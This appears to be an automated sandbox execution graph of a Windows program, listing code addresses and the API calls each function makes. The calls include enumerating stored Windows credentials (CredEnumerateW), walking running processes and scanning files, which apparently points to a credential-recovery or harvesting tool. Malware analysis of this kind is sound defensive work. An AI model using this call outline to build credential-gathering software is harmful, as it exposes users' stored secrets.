                                                              execution_graph 40148 441819 40151 430737 40148->40151 40150 441825 40152 430756 40151->40152 40164 43076d 40151->40164 40153 430774 40152->40153 40154 43075f 40152->40154 40166 43034a memcpy 40153->40166 40165 4169a7 11 API calls 40154->40165 40157 4307ce 40158 430819 memset 40157->40158 40167 415b2c 11 API calls 40157->40167 40158->40164 40159 43077e 40159->40157 40162 4307fa 40159->40162 40159->40164 40161 4307e9 40161->40158 40161->40164 40168 4169a7 11 API calls 40162->40168 40164->40150 40165->40164 40166->40159 40167->40161 40168->40164 37547 442ec6 19 API calls 37721 4152c6 malloc 37722 4152e2 37721->37722 37723 4152ef 37721->37723 37725 416760 11 API calls 37723->37725 37725->37722 37726 4466f4 37745 446904 37726->37745 37728 446700 GetModuleHandleA 37731 446710 __set_app_type __p__fmode __p__commode 37728->37731 37730 4467a4 37732 4467ac __setusermatherr 37730->37732 37733 4467b8 37730->37733 37731->37730 37732->37733 37746 4468f0 _controlfp 37733->37746 37735 4467bd _initterm __wgetmainargs _initterm 37736 44681e GetStartupInfoW 37735->37736 37737 446810 37735->37737 37739 446866 GetModuleHandleA 37736->37739 37747 41276d 37739->37747 37743 446896 exit 37744 44689d _cexit 37743->37744 37744->37737 37745->37728 37746->37735 37748 41277d 37747->37748 37790 4044a4 LoadLibraryW 37748->37790 37750 412785 37751 412789 37750->37751 37798 414b81 37750->37798 37751->37743 37751->37744 37754 4127c8 37804 412465 memset ??2@YAPAXI 37754->37804 37756 4127ea 37816 40ac21 37756->37816 37761 412813 37834 40dd07 memset 37761->37834 37762 412827 37839 40db69 memset 37762->37839 37765 412822 37861 4125b6 ??3@YAXPAX DeleteObject 37765->37861 37767 40ada2 _wcsicmp 37768 41283d 37767->37768 37768->37765 37771 412863 CoInitialize 37768->37771 37844 41268e 37768->37844 37770 412966 37862 40b1ab free free 37770->37862 37860 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37771->37860 37775 41296f 37863 40b633 37775->37863 37777 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37782 412957 CoUninitialize 37777->37782 37787 4128ca 37777->37787 37782->37765 37783 4128d0 TranslateAcceleratorW 37784 412941 GetMessageW 37783->37784 37783->37787 37784->37782 37784->37783 37785 412909 IsDialogMessageW 37785->37784 37785->37787 37786 4128fd IsDialogMessageW 37786->37784 37786->37785 37787->37783 37787->37785 37787->37786 37788 41292b TranslateMessage DispatchMessageW 37787->37788 37789 41291f IsDialogMessageW 37787->37789 37788->37784 37789->37784 37789->37788 37791 4044cf GetProcAddress 37790->37791 37795 4044f7 37790->37795 37792 4044e8 FreeLibrary 37791->37792 37794 4044df 37791->37794 37793 4044f3 37792->37793 37792->37795 37793->37795 37794->37792 37796 404507 MessageBoxW 37795->37796 37797 40451e 37795->37797 37796->37750 37797->37750 37799 414b8a 37798->37799 37800 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37798->37800 37867 40a804 memset 37799->37867 37800->37754 37803 414b9e GetProcAddress 37803->37800 37805 4124e0 37804->37805 37806 412505 ??2@YAPAXI 37805->37806 37807 41251c 37806->37807 37809 412521 37806->37809 37889 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37807->37889 37878 444722 37809->37878 37815 41259b wcscpy 37815->37756 37894 40b1ab free free 37816->37894 37820 40ad4b 37829 40ad76 37820->37829 37907 40a9ce 37820->37907 37821 40a9ce malloc memcpy free free 37825 40ac5c 37821->37825 37823 40ace7 free 37823->37825 37825->37820 37825->37821 37825->37823 37825->37829 37898 40a8d0 7 API calls 37825->37898 37899 4099f4 37825->37899 37895 40aa04 37829->37895 37830 40ada2 37831 40adc9 37830->37831 37832 40adaa 37830->37832 37831->37761 37831->37762 37832->37831 37833 40adb3 _wcsicmp 37832->37833 37833->37831 37833->37832 37913 40dce0 37834->37913 37836 40dd3a GetModuleHandleW 37918 40dba7 37836->37918 37840 40dce0 3 API calls 37839->37840 37841 40db99 37840->37841 37990 40dae1 37841->37990 38004 402f3a 37844->38004 37846 412766 37846->37765 37846->37771 37847 4126d3 _wcsicmp 37848 4126a8 37847->37848 37848->37846 37848->37847 37850 41270a 37848->37850 38038 4125f8 7 API calls 37848->38038 37850->37846 38007 411ac5 37850->38007 37860->37777 37861->37770 37862->37775 37864 40b640 37863->37864 37865 40b639 free 37863->37865 37866 40b1ab free free 37864->37866 37865->37864 37866->37751 37868 40a83b GetSystemDirectoryW 37867->37868 37869 40a84c wcscpy 37867->37869 37868->37869 37874 409719 wcslen 37869->37874 37872 40a881 LoadLibraryW 37873 40a886 37872->37873 37873->37800 37873->37803 37875 409724 37874->37875 37876 409739 wcscat LoadLibraryW 37874->37876 37875->37876 37877 40972c wcscat 37875->37877 37876->37872 37876->37873 37877->37876 37879 444732 37878->37879 37880 444728 DeleteObject 37878->37880 37890 409cc3 37879->37890 37880->37879 37882 412551 37883 4010f9 37882->37883 37884 401130 37883->37884 37885 401134 GetModuleHandleW LoadIconW 37884->37885 37886 401107 wcsncat 37884->37886 37887 40a7be 37885->37887 37886->37884 37888 40a7d2 37887->37888 37888->37815 37888->37888 37889->37809 37893 409bfd memset wcscpy 37890->37893 37892 409cdb CreateFontIndirectW 37892->37882 37893->37892 37894->37825 37896 40aa14 37895->37896 37897 40aa0a free 37895->37897 37896->37830 37897->37896 37898->37825 37900 409a41 37899->37900 37901 4099fb malloc 37899->37901 37900->37825 37903 409a37 37901->37903 37904 409a1c 37901->37904 37903->37825 37905 409a30 free 37904->37905 37906 409a20 memcpy 37904->37906 37905->37903 37906->37905 37908 40a9e7 37907->37908 37909 40a9dc free 37907->37909 37910 4099f4 3 API calls 37908->37910 37911 40a9f2 37909->37911 37910->37911 37912 40a8d0 7 API calls 37911->37912 37912->37829 37937 409bca GetModuleFileNameW 37913->37937 37915 40dce6 wcsrchr 37916 40dcf5 37915->37916 37917 40dcf9 wcscat 37915->37917 37916->37917 37917->37836 37938 44db70 37918->37938 37922 40dbfd 37941 4447d9 37922->37941 37925 40dc34 wcscpy wcscpy 37967 40d6f5 37925->37967 37926 40dc1f wcscpy 37926->37925 37929 40d6f5 3 API calls 37930 40dc73 37929->37930 37931 40d6f5 3 API calls 37930->37931 37932 40dc89 37931->37932 37933 40d6f5 3 API calls 37932->37933 37934 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37933->37934 37973 40da80 37934->37973 37937->37915 37939 40dbb4 memset memset 37938->37939 37940 409bca GetModuleFileNameW 37939->37940 37940->37922 37942 4447f4 37941->37942 37943 40dc1b 37942->37943 37944 444807 ??2@YAPAXI 37942->37944 37943->37925 37943->37926 37945 44481f 37944->37945 37946 444873 _snwprintf 37945->37946 37947 4448ab wcscpy 37945->37947 37980 44474a 8 API calls 37946->37980 37949 4448bb 37947->37949 37981 44474a 8 API calls 37949->37981 37951 4448a7 37951->37947 37951->37949 37952 4448cd 37982 44474a 8 API calls 37952->37982 37954 4448e2 37983 44474a 8 API calls 37954->37983 37956 4448f7 37984 44474a 8 API calls 37956->37984 37958 44490c 37985 44474a 8 API calls 37958->37985 37960 444921 37986 44474a 8 API calls 37960->37986 37962 444936 37987 44474a 8 API calls 37962->37987 37964 44494b 37988 44474a 8 API calls 37964->37988 37966 444960 ??3@YAXPAX 37966->37943 37968 44db70 37967->37968 37969 40d702 memset GetPrivateProfileStringW 37968->37969 37970 40d752 37969->37970 37971 40d75c WritePrivateProfileStringW 37969->37971 37970->37971 37972 40d758 37970->37972 37971->37972 37972->37929 37974 44db70 37973->37974 37975 40da8d memset 37974->37975 37976 40daac LoadStringW 37975->37976 37977 40dac6 37976->37977 37977->37976 37979 40dade 37977->37979 37989 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37977->37989 37979->37765 37980->37951 37981->37952 37982->37954 37983->37956 37984->37958 37985->37960 37986->37962 37987->37964 37988->37966 37989->37977 38000 409b98 GetFileAttributesW 37990->38000 37992 40daea 37993 40daef wcscpy wcscpy GetPrivateProfileIntW 37992->37993 37999 40db63 37992->37999 38001 40d65d GetPrivateProfileStringW 37993->38001 37995 40db3e 38002 40d65d GetPrivateProfileStringW 37995->38002 37997 40db4f 38003 40d65d GetPrivateProfileStringW 37997->38003 37999->37767 38000->37992 38001->37995 38002->37997 38003->37999 38039 40eaff 38004->38039 38008 411ae2 memset 38007->38008 38009 411b8f 38007->38009 38080 409bca GetModuleFileNameW 38008->38080 38021 411a8b 38009->38021 38011 411b0a wcsrchr 38012 411b22 wcscat 38011->38012 38013 411b1f 38011->38013 38081 414770 wcscpy wcscpy wcscpy CloseHandle 38012->38081 38013->38012 38015 411b67 38082 402afb 38015->38082 38019 411b7f 38138 40ea13 SendMessageW memset SendMessageW 38019->38138 38022 402afb 27 API calls 38021->38022 38023 411ac0 38022->38023 38024 4110dc 38023->38024 38025 41113e 38024->38025 38030 4110f0 38024->38030 38163 40969c LoadCursorW SetCursor 38025->38163 38027 411143 38164 444a54 38027->38164 38167 4032b4 38027->38167 38028 4110f7 _wcsicmp 38028->38030 38029 411157 38031 40ada2 _wcsicmp 38029->38031 38030->38025 38030->38028 38185 410c46 10 API calls 38030->38185 38034 411167 38031->38034 38032 4111af 38034->38032 38035 4111a6 qsort 38034->38035 38035->38032 38038->37848 38040 40eb10 38039->38040 38053 40e8e0 38040->38053 38043 40eb6c memcpy memcpy 38044 40ebe1 38043->38044 38045 40ebb7 38043->38045 38044->38043 38046 40ebf2 ??2@YAPAXI ??2@YAPAXI 38044->38046 38045->38044 38050 40d134 16 API calls 38045->38050 38047 40ec2e ??2@YAPAXI 38046->38047 38049 40ec65 38046->38049 38047->38049 38063 40ea7f 38049->38063 38050->38045 38052 402f49 38052->37848 38054 40e8f2 38053->38054 38055 40e8eb ??3@YAXPAX 38053->38055 38056 40e900 38054->38056 38057 40e8f9 ??3@YAXPAX 38054->38057 38055->38054 38058 40e911 38056->38058 38059 40e90a ??3@YAXPAX 38056->38059 38057->38056 38060 40e931 ??2@YAPAXI ??2@YAPAXI 38058->38060 38061 40e921 ??3@YAXPAX 38058->38061 38062 40e92a ??3@YAXPAX 38058->38062 38059->38058 38060->38043 38061->38062 38062->38060 38064 40aa04 free 38063->38064 38065 40ea88 38064->38065 38066 40aa04 free 38065->38066 38067 40ea90 38066->38067 38068 40aa04 free 38067->38068 38069 40ea98 38068->38069 38070 40aa04 free 38069->38070 38071 40eaa0 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eab3 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40eabd 38074->38075 38076 40a9ce 4 API calls 38075->38076 38077 40eac7 38076->38077 38078 40a9ce 4 API calls 38077->38078 38079 40ead1 38078->38079 38079->38052 38080->38011 38081->38015 38139 40b2cc 38082->38139 38084 402b0a 38085 40b2cc 27 API calls 38084->38085 38086 402b23 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b3a 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b54 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b6b 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402b82 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402b99 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bb0 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bc7 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402bde 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402bf5 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c0c 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c23 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c3a 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c51 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c68 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402c7f 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402c99 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cb3 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402cd5 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402cf0 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d0b 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d26 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d3e 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d59 38131->38132 38133 40b2cc 27 API calls 38132->38133 38134 402d78 38133->38134 38135 40b2cc 27 API calls 38134->38135 38136 402d93 38135->38136 38137 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38136->38137 38137->38019 38138->38009 38142 40b58d 38139->38142 38141 40b2d1 38141->38084 38143 40b5a4 GetModuleHandleW FindResourceW 38142->38143 38144 40b62e 38142->38144 38145 40b5c2 LoadResource 38143->38145 38147 40b5e7 38143->38147 38144->38141 38146 40b5d0 SizeofResource LockResource 38145->38146 38145->38147 38146->38147 38147->38144 38155 40afcf 38147->38155 38149 40b608 memcpy 38158 40b4d3 memcpy 38149->38158 38151 40b61e 38159 40b3c1 18 API calls 38151->38159 38153 40b626 38160 40b04b 38153->38160 38156 40b04b ??3@YAXPAX 38155->38156 38157 40afd7 ??2@YAPAXI 38156->38157 38157->38149 38158->38151 38159->38153 38161 40b051 ??3@YAXPAX 38160->38161 38162 40b05f 38160->38162 38161->38162 38162->38144 38163->38027 38165 444a64 FreeLibrary 38164->38165 38166 444a83 38164->38166 38165->38166 38166->38029 38168 4032c4 38167->38168 38169 40b633 free 38168->38169 38170 403316 38169->38170 38186 44553b 38170->38186 38174 403480 38384 40368c 15 API calls 38174->38384 38176 403489 38177 40b633 free 38176->38177 38178 403495 38177->38178 38178->38029 38179 4033a9 memset memcpy 38180 4033ec wcscmp 38179->38180 38181 40333c 38179->38181 38180->38181 38181->38174 38181->38179 38181->38180 38382 4028e7 11 API calls 38181->38382 38383 40f508 6 API calls 38181->38383 38183 403421 _wcsicmp 38183->38181 38185->38030 38187 445548 38186->38187 38188 445599 38187->38188 38385 40c768 38187->38385 38190 4455a8 memset 38188->38190 38271 4457f2 38188->38271 38468 403988 38190->38468 38196 4458aa 38198 44594a 38196->38198 38199 4458bb memset memset 38196->38199 38197 445672 38479 403fbe memset memset memset memset memset 38197->38479 38201 4459ed 38198->38201 38202 44595e memset memset 38198->38202 38204 414c2e 14 API calls 38199->38204 38212 445a00 memset memset 38201->38212 38213 445b22 38201->38213 38208 414c2e 14 API calls 38202->38208 38203 4455e5 38203->38197 38216 44560f 38203->38216 38209 4458f9 38204->38209 38205 44557a 38210 44558c 38205->38210 38663 4136c0 CoTaskMemFree 38205->38663 38206 445854 38206->38196 38593 403c9c memset memset memset memset memset 38206->38593 38214 44599c 38208->38214 38215 40b2cc 27 API calls 38209->38215 38452 444b06 38210->38452 38616 414c2e 38212->38616 38219 445bca 38213->38219 38220 445b38 memset memset memset 38213->38220 38226 40b2cc 27 API calls 38214->38226 38227 445909 38215->38227 38229 4087b3 337 API calls 38216->38229 38218 445849 38679 40b1ab free free 38218->38679 38228 445c8b memset memset 38219->38228 38284 445cf0 38219->38284 38232 445bd4 38220->38232 38233 445b98 38220->38233 38234 4459ac 38226->38234 38243 409d1f 6 API calls 38227->38243 38235 414c2e 14 API calls 38228->38235 38244 445621 38229->38244 38230 445585 38664 41366b FreeLibrary 38230->38664 38231 44589f 38680 40b1ab free free 38231->38680 38241 414c2e 14 API calls 38232->38241 38233->38232 38237 445ba2 38233->38237 38246 409d1f 6 API calls 38234->38246 38247 445cc9 38235->38247 38750 4099c6 wcslen 38237->38750 38238 4456b2 38667 40b1ab free free 38238->38667 38239 40b2cc 27 API calls 38250 445a4f 38239->38250 38252 445be2 38241->38252 38242 403335 38381 4452e5 45 API calls 38242->38381 38255 445919 38243->38255 38665 4454bf 20 API calls 38244->38665 38245 445823 38245->38218 38264 4087b3 337 API calls 38245->38264 38257 4459bc 38246->38257 38258 409d1f 6 API calls 38247->38258 38248 445879 38248->38231 38268 4087b3 337 API calls 38248->38268 38629 409d1f wcslen wcslen 38250->38629 38262 40b2cc 27 API calls 38252->38262 38253 445d3d 38282 40b2cc 27 API calls 38253->38282 38254 445d88 memset memset memset 38256 414c2e 14 API calls 38254->38256 38681 409b98 GetFileAttributesW 38255->38681 38265 445dde 38256->38265 38746 409b98 GetFileAttributesW 38257->38746 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38260 445680 38260->38238 38502 4087b3 memset 38260->38502 38272 445bf3 38262->38272 38264->38245 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38248 38271->38206 38570 403e2d memset memset memset memset memset 38271->38570 38281 409d1f 6 API calls 38272->38281 38273 445928 38273->38198 38682 40b6ef 38273->38682 38283 445def 38275->38283 38276 4459cb 38276->38201 38294 40b6ef 249 API calls 38276->38294 38280 40b2cc 27 API calls 38286 445a94 38280->38286 38288 445c07 38281->38288 38289 445d54 _wcsicmp 38282->38289 38292 409d1f 6 API calls 38283->38292 38284->38242 38284->38253 38284->38254 38285 445389 255 API calls 38285->38219 38634 40ae18 38286->38634 38287 44566d 38287->38271 38553 413d4c 38287->38553 38297 445389 255 API calls 38288->38297 38298 445d71 38289->38298 38359 445d67 38289->38359 38291 445665 38666 40b1ab free free 38291->38666 38300 445e03 38292->38300 38294->38201 38302 445c17 38297->38302 38771 445093 23 API calls 38298->38771 38299 44563c 38299->38291 38304 4087b3 337 API calls 38299->38304 38772 409b98 GetFileAttributesW 38300->38772 38301 4456d8 38307 40b2cc 27 API calls 38301->38307 38308 40b2cc 27 API calls 38302->38308 38304->38299 38306 40b6ef 249 API calls 38306->38242 38312 4456e2 38307->38312 38313 445c23 38308->38313 38309 445d83 38309->38242 38311 445e12 38317 445e6b 38311->38317 38321 40b2cc 27 API calls 38311->38321 38668 413fa6 _wcsicmp _wcsicmp 38312->38668 38315 409d1f 6 API calls 38313->38315 38319 445c37 38315->38319 38316 445b17 38747 40aebe 38316->38747 38774 445093 23 API calls 38317->38774 38318 4456eb 38324 4456fd memset memset memset memset 38318->38324 38325 4457ea 38318->38325 38326 445389 255 API calls 38319->38326 38328 445e33 38321->38328 38669 409c70 wcscpy wcsrchr 38324->38669 38672 413d29 38325->38672 38327 445c47 38326->38327 38333 40b2cc 27 API calls 38327->38333 38334 409d1f 6 API calls 38328->38334 38330 445e7e 38335 445f67 38330->38335 38338 445c53 38333->38338 38339 445e47 38334->38339 38340 40b2cc 27 API calls 38335->38340 38336 445ab2 memset 38341 40b2cc 27 API calls 38336->38341 38337 409c70 2 API calls 38342 44577e 38337->38342 38343 409d1f 6 API calls 38338->38343 38773 409b98 GetFileAttributesW 38339->38773 38345 445f73 38340->38345 38346 445aa1 38341->38346 38347 409c70 2 API calls 38342->38347 38348 445c67 38343->38348 38350 409d1f 6 API calls 38345->38350 38346->38316 38346->38336 38351 409d1f 6 API calls 38346->38351 38641 40add4 38346->38641 38646 445389 38346->38646 38655 40ae51 38346->38655 38352 44578d 38347->38352 38353 445389 255 API calls 38348->38353 38349 445e56 38349->38317 38356 445e83 memset 38349->38356 38354 445f87 38350->38354 38351->38346 38352->38325 38358 40b2cc 27 API calls 38352->38358 38353->38219 38777 409b98 GetFileAttributesW 38354->38777 38360 40b2cc 27 API calls 38356->38360 38361 4457a8 38358->38361 38359->38242 38359->38306 38362 445eab 38360->38362 38363 409d1f 6 API calls 38361->38363 38364 409d1f 6 API calls 38362->38364 38365 4457b8 38363->38365 38366 445ebf 38364->38366 38671 409b98 GetFileAttributesW 38365->38671 38368 40ae18 9 API calls 38366->38368 38376 445ef5 38368->38376 38369 4457c7 38369->38325 38371 4087b3 337 API calls 38369->38371 38370 40ae51 9 API calls 38370->38376 38371->38325 38372 445f5c 38373 40aebe FindClose 38372->38373 38373->38335 38374 40add4 2 API calls 38374->38376 38375 40b2cc 27 API calls 38375->38376 38376->38370 38376->38372 38376->38374 38376->38375 38377 409d1f 6 API calls 38376->38377 38379 445f3a 38376->38379 38775 409b98 GetFileAttributesW 38376->38775 38377->38376 38776 445093 23 API calls 38379->38776 38381->38181 38382->38183 38383->38181 38384->38176 38386 40c775 38385->38386 38778 40b1ab free free 38386->38778 38388 40c788 38779 40b1ab free free 38388->38779 38390 40c790 38780 40b1ab free free 38390->38780 38392 40c798 38393 40aa04 free 38392->38393 38394 40c7a0 38393->38394 38781 40c274 memset 38394->38781 38399 40a8ab 9 API calls 38400 40c7c3 38399->38400 38401 40a8ab 9 API calls 38400->38401 38402 40c7d0 38401->38402 38810 40c3c3 38402->38810 38406 40c877 38415 40bdb0 38406->38415 38407 40c86c 38836 4053fe 39 API calls 38407->38836 38410 40c813 _wcslwr 38834 40c634 49 API calls 38410->38834 38412 40c829 wcslen 38413 40c7e5 38412->38413 38413->38406 38413->38407 38833 40a706 wcslen memcpy 38413->38833 38835 40c634 49 API calls 38413->38835 39021 404363 38415->39021 38418 40bf5d 39041 40440c 38418->39041 38420 40bdee 38420->38418 38423 40b2cc 27 API calls 38420->38423 38421 40bddf CredEnumerateW 38421->38420 38424 40be02 wcslen 38423->38424 38424->38418 38431 40be1e 38424->38431 38425 40be26 wcsncmp 38425->38431 38428 40be7d memset 38429 40bea7 memcpy 38428->38429 38428->38431 38430 40bf11 wcschr 38429->38430 38429->38431 38430->38431 38431->38418 38431->38425 38431->38428 38431->38429 38431->38430 38432 40b2cc 27 API calls 38431->38432 38434 40bf43 LocalFree 38431->38434 39044 40bd5d 28 API calls 38431->39044 39045 404423 38431->39045 38433 40bef6 _wcsnicmp 38432->38433 38433->38430 38433->38431 38434->38431 38435 4135f7 39058 4135e0 38435->39058 38438 40b2cc 27 API calls 38439 41360d 38438->38439 38440 40a804 8 API calls 38439->38440 38441 413613 38440->38441 38442 41361b 38441->38442 38443 41363e 38441->38443 38444 40b273 27 API calls 38442->38444 38445 4135e0 FreeLibrary 38443->38445 38446 413625 GetProcAddress 38444->38446 38447 413643 38445->38447 38446->38443 38448 413648 38446->38448 38447->38205 38449 413658 38448->38449 38450 4135e0 FreeLibrary 38448->38450 38449->38205 38451 413666 38450->38451 38451->38205 39061 4449b9 38452->39061 38455 4449b9 42 API calls 38457 444b4b 38455->38457 38456 444c15 38459 4449b9 42 API calls 38456->38459 38457->38456 39082 444972 GetVersionExW 38457->39082 38460 444c1f 38459->38460 38460->38188 38461 444b99 memcmp 38466 444b8c 38461->38466 38462 444c0b 39086 444a85 42 API calls 38462->39086 38466->38461 38466->38462 39083 444aa5 42 API calls 38466->39083 39084 40a7a0 GetVersionExW 38466->39084 39085 444a85 42 API calls 38466->39085 38469 40399d 38468->38469 39087 403a16 38469->39087 38471 403a09 39101 40b1ab free free 38471->39101 38473 403a12 wcsrchr 38473->38203 38474 4039a3 38474->38471 38477 4039f4 38474->38477 39098 40a02c CreateFileW 38474->39098 38477->38471 38478 4099c6 2 API calls 38477->38478 38478->38471 38480 414c2e 14 API calls 38479->38480 38481 404048 38480->38481 38482 414c2e 14 API calls 38481->38482 38483 404056 38482->38483 38484 409d1f 6 API calls 38483->38484 38485 404073 38484->38485 38486 409d1f 6 API calls 38485->38486 38487 40408e 38486->38487 38488 409d1f 6 API calls 38487->38488 38489 4040a6 38488->38489 38490 403af5 20 API calls 38489->38490 38491 4040ba 38490->38491 38492 403af5 20 API calls 38491->38492 38493 4040cb 38492->38493 39128 40414f memset 38493->39128 38495 404140 39142 40b1ab free free 38495->39142 38497 4040ec memset 38500 4040e0 38497->38500 38498 404148 38498->38260 38499 4099c6 2 API calls 38499->38500 38500->38495 38500->38497 38500->38499 38501 40a8ab 9 API calls 38500->38501 38501->38500 39155 40a6e6 WideCharToMultiByte 38502->39155 38504 4087ed 39156 4095d9 memset 38504->39156 38507 408809 memset memset memset memset memset 38508 40b2cc 27 API calls 38507->38508 38509 4088a1 38508->38509 38510 409d1f 6 API calls 38509->38510 38511 4088b1 38510->38511 38512 40b2cc 27 API calls 38511->38512 38513 4088c0 38512->38513 38514 409d1f 6 API calls 38513->38514 38515 4088d0 38514->38515 38516 40b2cc 27 API calls 38515->38516 38517 4088df 38516->38517 38518 409d1f 6 API calls 38517->38518 38519 4088ef 38518->38519 38520 40b2cc 27 API calls 38519->38520 38521 4088fe 38520->38521 38522 409d1f 6 API calls 38521->38522 38523 40890e 38522->38523 38524 40b2cc 27 API calls 38523->38524 38525 40891d 38524->38525 38526 409d1f 6 API calls 38525->38526 38527 40892d 38526->38527 39175 409b98 GetFileAttributesW 38527->39175 38529 40893e 38530 408943 38529->38530 38531 408958 38529->38531 39176 407fdf 75 API calls 38530->39176 39177 409b98 GetFileAttributesW 38531->39177 38534 408953 38534->38260 38535 408964 38536 408969 38535->38536 38537 40897b 38535->38537 39178 4082c7 198 API calls 38536->39178 39179 409b98 GetFileAttributesW 38537->39179 38540 408987 38541 4089a1 38540->38541 38542 40898c 38540->38542 39181 409b98 GetFileAttributesW 38541->39181 38554 40b633 free 38553->38554 38555 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38554->38555 38556 413f00 Process32NextW 38555->38556 38557 413da5 OpenProcess 38556->38557 38558 413f17 CloseHandle 38556->38558 38559 413eb0 38557->38559 38560 413df3 memset 38557->38560 38558->38301 38559->38556 38562 413ebf free 38559->38562 38563 4099f4 3 API calls 38559->38563 39445 413f27 38560->39445 38562->38559 38563->38559 38564 413e37 GetModuleHandleW 38566 413e46 GetProcAddress 38564->38566 38567 413e1f 38564->38567 38566->38567 38567->38564 39450 413959 38567->39450 39466 413ca4 38567->39466 38569 413ea2 CloseHandle 38569->38559 38571 414c2e 14 API calls 38570->38571 38572 403eb7 38571->38572 38573 414c2e 14 API calls 38572->38573 38574 403ec5 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403ee2 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403efd 38577->38578 38579 409d1f 6 API calls 38578->38579 38580 403f15 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f29 38581->38582 38583 403af5 20 API calls 38582->38583 38584 403f3a 38583->38584 38585 40414f 33 API calls 38584->38585 38591 403f4f 38585->38591 38586 403faf 39480 40b1ab free free 38586->39480 38588 403f5b memset 38588->38591 38589 403fb7 38589->38245 38590 4099c6 2 API calls 38590->38591 38591->38586 38591->38588 38591->38590 38592 40a8ab 9 API calls 38591->38592 38592->38591 38594 414c2e 14 API calls 38593->38594 38595 403d26 38594->38595 38596 414c2e 14 API calls 38595->38596 38597 403d34 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d51 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d6c 38600->38601 38602 409d1f 6 API calls 38601->38602 38603 403d84 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403d98 38604->38605 38606 403af5 20 API calls 38605->38606 38607 403da9 38606->38607 38608 40414f 33 API calls 38607->38608 38609 403dbe 38608->38609 38610 403e1e 38609->38610 38611 403dca memset 38609->38611 38614 4099c6 2 API calls 38609->38614 38615 40a8ab 9 API calls 38609->38615 39481 40b1ab free free 38610->39481 38611->38609 38613 403e26 38613->38248 38614->38609 38615->38609 38617 414b81 9 API calls 38616->38617 38618 414c40 38617->38618 38619 414c73 memset 38618->38619 39482 409cea 38618->39482 38623 414c94 38619->38623 38622 414c64 38622->38239 38624 414cf4 wcscpy 38623->38624 39485 414bb0 wcscpy 38623->39485 38624->38622 38626 414cd2 39486 4145ac RegQueryValueExW 38626->39486 38628 414ce9 38628->38624 38630 409d62 38629->38630 38631 409d43 wcscpy 38629->38631 38630->38280 38632 409719 2 API calls 38631->38632 38633 409d51 wcscat 38632->38633 38633->38630 38635 40aebe FindClose 38634->38635 38636 40ae21 38635->38636 38637 4099c6 2 API calls 38636->38637 38638 40ae35 38637->38638 38639 409d1f 6 API calls 38638->38639 38640 40ae49 38639->38640 38640->38346 38642 40ade0 38641->38642 38645 40ae0f 38641->38645 38643 40ade7 wcscmp 38642->38643 38642->38645 38644 40adfe wcscmp 38643->38644 38643->38645 38644->38645 38645->38346 38647 40ae18 9 API calls 38646->38647 38653 4453c4 38647->38653 38648 40ae51 9 API calls 38648->38653 38649 4453f3 38651 40aebe FindClose 38649->38651 38650 40add4 2 API calls 38650->38653 38652 4453fe 38651->38652 38652->38346 38653->38648 38653->38649 38653->38650 38654 445403 250 API calls 38653->38654 38654->38653 38656 40ae7b FindNextFileW 38655->38656 38657 40ae5c FindFirstFileW 38655->38657 38658 40ae94 38656->38658 38659 40ae8f 38656->38659 38657->38658 38661 40aeb6 38658->38661 38662 409d1f 6 API calls 38658->38662 38660 40aebe FindClose 38659->38660 38660->38658 38661->38346 38662->38661 38663->38230 38664->38210 38665->38299 38666->38287 38667->38287 38668->38318 38670 409c89 38669->38670 38670->38337 38671->38369 38673 413d39 38672->38673 38674 413d2f FreeLibrary 38672->38674 38675 40b633 free 38673->38675 38674->38673 38676 413d42 38675->38676 38677 40b633 free 38676->38677 38678 413d4a 38677->38678 38678->38271 38679->38206 38680->38196 38681->38273 38683 44db70 38682->38683 38684 40b6fc memset 38683->38684 38685 409c70 2 API calls 38684->38685 38686 40b732 wcsrchr 38685->38686 38687 40b743 38686->38687 38688 40b746 memset 38686->38688 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 40b76f 38689->38690 38691 409d1f 6 API calls 38690->38691 38692 40b783 38691->38692 39487 409b98 GetFileAttributesW 38692->39487 38694 40b7c2 39488 40bb98 38694->39488 38695 40b792 38695->38694 38696 409c70 2 API calls 38695->38696 38698 40b7a5 38696->38698 38700 40b2cc 27 API calls 38698->38700 38703 40b7b2 38700->38703 38701 40b837 CloseHandle 38705 40b83e memset 38701->38705 38702 40b817 39522 409a45 GetTempPathW 